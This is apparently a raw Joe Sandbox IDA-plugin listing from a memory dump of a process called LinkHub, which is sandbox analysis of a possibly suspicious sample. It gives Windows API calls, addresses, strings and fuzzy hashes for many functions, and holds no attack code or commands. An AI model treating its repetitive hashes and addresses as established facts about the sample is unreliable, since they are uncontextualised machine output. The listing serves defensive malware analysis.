                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                    • API String ID: 636576611-1287834457
                                                                    • Opcode ID: 0cb1a3dea269e558b6176b8911f3fd79c3b9476820557c89bf2201e61e1079f7
                                                                    • Instruction ID: 2edcec0a4742da6312e7dc5451fac7abb659dc6e7562f330b0a908e0f42c5572
                                                                    • Opcode Fuzzy Hash: 0cb1a3dea269e558b6176b8911f3fd79c3b9476820557c89bf2201e61e1079f7
                                                                    • Instruction Fuzzy Hash: A561D170624701AFD311EF64C899F5BB7E8AF89714F100A4DF9859B291CB70ED58CB92
                                                                    APIs
                                                                    • GetLocalTime.KERNEL32(?), ref: 002B8C9C
                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 002B8CAC
                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002B8CB8
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002B8D55
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002B8D69
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002B8D9B
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 002B8DD1
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002B8DDA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectoryTime$File$Local$System
                                                                    • String ID: *.*
                                                                    • API String ID: 1464919966-438819550
                                                                    • Opcode ID: 59dfb6c82572638eb0a0b266ebf9c36c9075a7a95fe265164e2bb45456b1fb30
                                                                    • Instruction ID: 52bcaab4ae4ec0aab51db666387b0528bf5e5a9f08349e44a9cafe60e21c5b2d
                                                                    • Opcode Fuzzy Hash: 59dfb6c82572638eb0a0b266ebf9c36c9075a7a95fe265164e2bb45456b1fb30
                                                                    • Instruction Fuzzy Hash: 7C616AB2524306AFDB14EF60C84499EB7ECFF89310F04481AF98987251DB31E965CF92
                                                                    APIs
                                                                    • CreateMenu.USER32 ref: 002D4715
                                                                    • SetMenu.USER32(?,00000000), ref: 002D4724
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002D47AC
                                                                    • IsMenu.USER32(?), ref: 002D47C0
                                                                    • CreatePopupMenu.USER32 ref: 002D47CA
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002D47F7
                                                                    • DrawMenuBar.USER32 ref: 002D47FF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                    • String ID: 0$F
                                                                    • API String ID: 161812096-3044882817
                                                                    • Opcode ID: d03ad913a34f53ad1137c935b7f0e3369050d25a6023167d80cbb26760cc1424
                                                                    • Instruction ID: a81fde4526de8525a6e40d4a3c8ad39027e1d6fbdc046f725ca086e82c06d5a4
                                                                    • Opcode Fuzzy Hash: d03ad913a34f53ad1137c935b7f0e3369050d25a6023167d80cbb26760cc1424
                                                                    • Instruction Fuzzy Hash: 06417A75A1220AEFDB14DF64E848EAABBB9FF09314F14412AFA4597350C770AD24DF50
                                                                    APIs
                                                                      • Part of subcall function 0024B329: _wcslen.LIBCMT ref: 0024B333
                                                                      • Part of subcall function 002A45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002A4620
                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 002A28B1
                                                                    • GetDlgCtrlID.USER32 ref: 002A28BC
                                                                    • GetParent.USER32 ref: 002A28D8
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 002A28DB
                                                                    • GetDlgCtrlID.USER32(?), ref: 002A28E4
                                                                    • GetParent.USER32(?), ref: 002A28F8
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 002A28FB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 711023334-1403004172
                                                                    • Opcode ID: 1d6a55f49a25411d6a4b87908be41b6d0a3289e1cb27f582adb41ae824ac3902
                                                                    • Instruction ID: 6d65201866b8c7993fcf794316957afcc4f36f8d2a34946599090c08664ad3ab
                                                                    • Opcode Fuzzy Hash: 1d6a55f49a25411d6a4b87908be41b6d0a3289e1cb27f582adb41ae824ac3902
                                                                    • Instruction Fuzzy Hash: D621AF74D10118ABCF05AFA4DC89DEEBBB8EF0A310F100156F951A7291DB759828DFA0
                                                                    APIs
                                                                      • Part of subcall function 0024B329: _wcslen.LIBCMT ref: 0024B333
                                                                      • Part of subcall function 002A45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002A4620
                                                                    • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 002A2990
                                                                    • GetDlgCtrlID.USER32 ref: 002A299B
                                                                    • GetParent.USER32 ref: 002A29B7
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 002A29BA
                                                                    • GetDlgCtrlID.USER32(?), ref: 002A29C3
                                                                    • GetParent.USER32(?), ref: 002A29D7
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 002A29DA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 711023334-1403004172
                                                                    • Opcode ID: 9afb7019e949e511bd1870abe0eefac2e309d579bdabfe3713a014de1f13f307
                                                                    • Instruction ID: c406f112ec0169cf49ce7c8c6be8d61dff933b3e849b6c247e1b58d1906f970e
                                                                    • Opcode Fuzzy Hash: 9afb7019e949e511bd1870abe0eefac2e309d579bdabfe3713a014de1f13f307
                                                                    • Instruction Fuzzy Hash: E021FF74D10208BBCF05AFA4EC85EEEBBB8EF05300F100057B951A7191CB758828CFA0
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 002D4539
                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 002D453C
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002D4563
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002D4586
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002D45FE
                                                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 002D4648
                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 002D4663
                                                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 002D467E
                                                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 002D4692
                                                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 002D46AF
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$LongWindow
                                                                    • String ID:
                                                                    • API String ID: 312131281-0
                                                                    • Opcode ID: 782ed15eda727c85339107fe6fa7634bdfb03861a2fc76a3b3645faf9c184d94
                                                                    • Instruction ID: 03429368c19765b314ff112941572ff4227ba11da04f911ed2a36c51a5ac5413
                                                                    • Opcode Fuzzy Hash: 782ed15eda727c85339107fe6fa7634bdfb03861a2fc76a3b3645faf9c184d94
                                                                    • Instruction Fuzzy Hash: 44617975A00209AFDB11DFA8CC81EEE77B8EB09710F10415AFA05A73A1D774AE65DB90
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 002ABB18
                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,002AABA8,?,00000001), ref: 002ABB2C
                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 002ABB33
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002AABA8,?,00000001), ref: 002ABB42
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 002ABB54
                                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,002AABA8,?,00000001), ref: 002ABB6D
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002AABA8,?,00000001), ref: 002ABB7F
                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,002AABA8,?,00000001), ref: 002ABBC4
                                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,002AABA8,?,00000001), ref: 002ABBD9
                                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,002AABA8,?,00000001), ref: 002ABBE4
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                    • String ID:
                                                                    • API String ID: 2156557900-0
                                                                    • Opcode ID: ef61a9cebf59fadc15d4ea97aec51cb4fb6da77c67ce27da87cafe2503d74feb
                                                                    • Instruction ID: 15ce81292fb360106ce9d49b2ebf66cd9a3d3164288021cf6a7e69e72eca8954
                                                                    • Opcode Fuzzy Hash: ef61a9cebf59fadc15d4ea97aec51cb4fb6da77c67ce27da87cafe2503d74feb
                                                                    • Instruction Fuzzy Hash: 8731A0B5915605AFDB129F15EC88FA9B7ADAB0D31AF118416FE05861A1CBB4DC40CFA0
                                                                    APIs
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002B89F2
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002B8A06
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 002B8A30
                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 002B8A4A
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002B8A5C
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002B8AA5
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 002B8AF5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$AttributesFile
                                                                    • String ID: *.*
                                                                    • API String ID: 769691225-438819550
                                                                    • Opcode ID: 9211c440cb93cf66e7d48aebff6df148866f78a96d3a53256af6761f79c1bd15
                                                                    • Instruction ID: 7b59e347858b626dfad6c2cf7ae52724acdbd4258470eb38469b8148b9833d81
                                                                    • Opcode Fuzzy Hash: 9211c440cb93cf66e7d48aebff6df148866f78a96d3a53256af6761f79c1bd15
                                                                    • Instruction Fuzzy Hash: 5181B1729247059BCB24EF14C444AFAB3ECBF84390F58481AF889D7251DF74E9A5CB92
                                                                    APIs
                                                                    • IsWindow.USER32(00000000), ref: 002D8992
                                                                    • IsWindowEnabled.USER32(00000000), ref: 002D899E
                                                                    • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 002D8A79
                                                                    • SendMessageW.USER32(00000000,000000B0,?,?), ref: 002D8AAC
                                                                    • IsDlgButtonChecked.USER32(?,00000000), ref: 002D8AE4
                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 002D8B06
                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 002D8B1E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                    • String ID: (1
                                                                    • API String ID: 4072528602-3903994380
                                                                    • Opcode ID: d987c6cd394dee2ffc2b4728c0f3b1f89d8738fed219d69e557f7c5dac3ec860
                                                                    • Instruction ID: af1ac45f3e6a3f12df548267869fe0e99932dd609658cf14162f1e02a2e2773f
                                                                    • Opcode Fuzzy Hash: d987c6cd394dee2ffc2b4728c0f3b1f89d8738fed219d69e557f7c5dac3ec860
                                                                    • Instruction Fuzzy Hash: F571BF74A14246AFEB219F54C894FFABBB9EF09300F14049BE885A7361CB31AD60CB51
                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 002474D7
                                                                      • Part of subcall function 00247567: GetClientRect.USER32(?,?), ref: 0024758D
                                                                      • Part of subcall function 00247567: GetWindowRect.USER32(?,?), ref: 002475CE
                                                                      • Part of subcall function 00247567: ScreenToClient.USER32(?,?), ref: 002475F6
                                                                    • GetDC.USER32 ref: 00286083
                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00286096
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 002860A4
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 002860B9
                                                                    • ReleaseDC.USER32(?,00000000), ref: 002860C1
                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00286152
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                    • String ID: U
                                                                    • API String ID: 4009187628-3372436214
                                                                    • Opcode ID: 10359dac7cb8634111150cf24374689e916f0298cb1ed0ac668e68223db80dfb
                                                                    • Instruction ID: 5c860b4ebccd662359338a944ad00c269e7f1582109554f8885a5d644c3c43b8
                                                                    • Opcode Fuzzy Hash: 10359dac7cb8634111150cf24374689e916f0298cb1ed0ac668e68223db80dfb
                                                                    • Instruction Fuzzy Hash: 5C71C138521206DFCF25EF64C888ABA7BB5FF49310F14426AED595A2A7C7318C60DF50
                                                                    APIs
                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002BCCB7
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002BCCDF
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 002BCD0F
                                                                    • GetLastError.KERNEL32 ref: 002BCD67
                                                                    • SetEvent.KERNEL32(?), ref: 002BCD7B
                                                                    • InternetCloseHandle.WININET(00000000), ref: 002BCD86
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                    • String ID:
                                                                    • API String ID: 3113390036-3916222277
                                                                    • Opcode ID: 28e717e488f73545b991f71a8d817498be5cb5c079d1e93fa3143132b45663f7
                                                                    • Instruction ID: ae46975ec195a9bc97f9de7bc95e3c9b29e91d0a9e37ec7ec1b56f6ec0e68db3
                                                                    • Opcode Fuzzy Hash: 28e717e488f73545b991f71a8d817498be5cb5c079d1e93fa3143132b45663f7
                                                                    • Instruction Fuzzy Hash: 58319F75921606AFD721AF64DC88AEB7BFCEB44B80B20452AF846D3201DB34ED149B60
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,002855AE,?,?,Bad directive syntax error,002DDCD0,00000000,00000010,?,?), ref: 002AA236
                                                                    • LoadStringW.USER32(00000000,?,002855AE,?), ref: 002AA23D
                                                                      • Part of subcall function 0024B329: _wcslen.LIBCMT ref: 0024B333
                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 002AA301
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadMessageModuleString_wcslen
                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                    • API String ID: 858772685-4153970271
                                                                    • Opcode ID: a2f74d51160e5df1df2e5671155d3c4c40f6f7c7d0d2e12526466ae1a2f3565b
                                                                    • Instruction ID: b479b4ef7570ca36b8190396fe0d74bf3c81ce8f680a7ef1388e4f53bcad6e14
                                                                    • Opcode Fuzzy Hash: a2f74d51160e5df1df2e5671155d3c4c40f6f7c7d0d2e12526466ae1a2f3565b
                                                                    • Instruction Fuzzy Hash: 18215E31C2021AEBCF06AFA0CC1AEEE7B39BF19304F004466F515650A2EB71A628DF51
                                                                    APIs
                                                                    • GetParent.USER32 ref: 002A29F8
                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 002A2A0D
                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 002A2A9A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameParentSend
                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                    • API String ID: 1290815626-3381328864
                                                                    • Opcode ID: de995fd49a5ca38df0955c7b6f9291d524b5036f9cf06e307f23cbad79edff02
                                                                    • Instruction ID: b1e5a00412aca574997509e55059e095ca66cf5b15cc2eb59288856f43c4b49d
                                                                    • Opcode Fuzzy Hash: de995fd49a5ca38df0955c7b6f9291d524b5036f9cf06e307f23cbad79edff02
                                                                    • Instruction Fuzzy Hash: 831106B6AA4707FBFA257629EC0BDE6779C8F16724B200012F905E40D6FFA1A8744954
                                                                    APIs
                                                                    • GetClientRect.USER32(?,?), ref: 0024758D
                                                                    • GetWindowRect.USER32(?,?), ref: 002475CE
                                                                    • ScreenToClient.USER32(?,?), ref: 002475F6
                                                                    • GetClientRect.USER32(?,?), ref: 0024773A
                                                                    • GetWindowRect.USER32(?,?), ref: 0024775B
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Rect$Client$Window$Screen
                                                                    • String ID:
                                                                    • API String ID: 1296646539-0
                                                                    • Opcode ID: 94647882bb4094b3e6056f1f65e7c1c26cf058cdbaa7a28f88d0a0a94132cd83
                                                                    • Instruction ID: dbc2a7ef6e99468b63c2f080140c286048bc0dfce2ac489d86c4967ee0d349c7
                                                                    • Opcode Fuzzy Hash: 94647882bb4094b3e6056f1f65e7c1c26cf058cdbaa7a28f88d0a0a94132cd83
                                                                    • Instruction Fuzzy Hash: 70C19D3892560AEFDB14DFA8C444BEDB7F5FF08310F14841AE8A9E7250D774A960DBA0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                    • String ID:
                                                                    • API String ID: 1282221369-0
                                                                    • Opcode ID: 1b875105c4fa584e23f36bbe717e357b199c13a2c831310353015424c4cbc9b3
                                                                    • Instruction ID: 1eedea5f49fe7101ad29f86316cd65241f8e72bbc5a0906271605f568d40f66e
                                                                    • Opcode Fuzzy Hash: 1b875105c4fa584e23f36bbe717e357b199c13a2c831310353015424c4cbc9b3
                                                                    • Instruction Fuzzy Hash: 2D613871925302EFDB22AF74E8816BD7BB89F05320F04C16DED4CA7297D67198218B51
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 002D5C24
                                                                    • ShowWindow.USER32(?,00000000), ref: 002D5C65
                                                                    • ShowWindow.USER32(?,00000005,?,00000000), ref: 002D5C6B
                                                                    • SetFocus.USER32(?,?,00000005,?,00000000), ref: 002D5C6F
                                                                      • Part of subcall function 002D79F2: DeleteObject.GDI32(00000000), ref: 002D7A1E
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002D5CAB
